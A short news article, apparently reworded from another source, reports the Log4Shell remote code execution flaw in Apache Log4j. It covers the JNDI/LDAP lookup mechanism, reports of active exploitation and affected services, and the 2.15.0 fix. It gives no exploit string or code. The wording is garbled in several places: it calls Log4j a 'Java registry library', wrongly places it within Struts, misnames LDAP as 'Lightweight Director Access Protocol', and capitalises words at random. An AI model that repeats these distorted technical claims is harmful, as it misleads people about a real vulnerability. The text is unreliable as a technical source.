Critical ‘Log4Shell’ RCE zero-day exploited in large numbers

Simple to use exploit that can be used for remote code execution and to gain full control over millions of vulnerable business systems via a Java registry library is currently being abused in large numbers, researchers warn.

The bug It is found in the Apache Foundation’s open source Struts Log4J logging utility, version 2.14 and earlier.

It is caused by the Java Naming and Directory Interface (JNDI) application programming interface not protecting against Searches on endpoints controlled by attackers, including those using Lightweight Director Access Protocol (LDAP).

When a vulnerable application writes to a log file, the default Log4j setting means that the library looks for a server that, if controlled by an attacker, can be configured to send a malicious response from that system.

The response can contain a remote Java class file that is injected into the server process and runs with the same privileges as the vulnerable application that uses the registry library.

A proof of concept was posted on Twitter and Github, and the vulnerability is rated a total of 10 out of 10 possible on the Common Vulnerability Scoring System (CVSS).

Computer Emergency Response Teams Around the World Now reporting Active exploitation of the error by automated systems.

Researchers so far confirmed that Apple’s iCloud service, Valve’s Steam gaming platform, and Microsoft’s popular Minecraft game are all vulnerable to the bug, which is called Log4Shell.

In Minecraft, testers have reported have been able to trigger the error by pasting the exploit string into a chat window.

The Apache Foundation has released log4j version 2.15.0, which is not vulnerable to Log4Shell by default.

Administrators with earlier versions of Log4j can also disable message lookups that trigger the arbitrary code execution error.

Chen Zhaojun from Alibaba’s cloud security team is credited with finding the bug.

Leave a Comment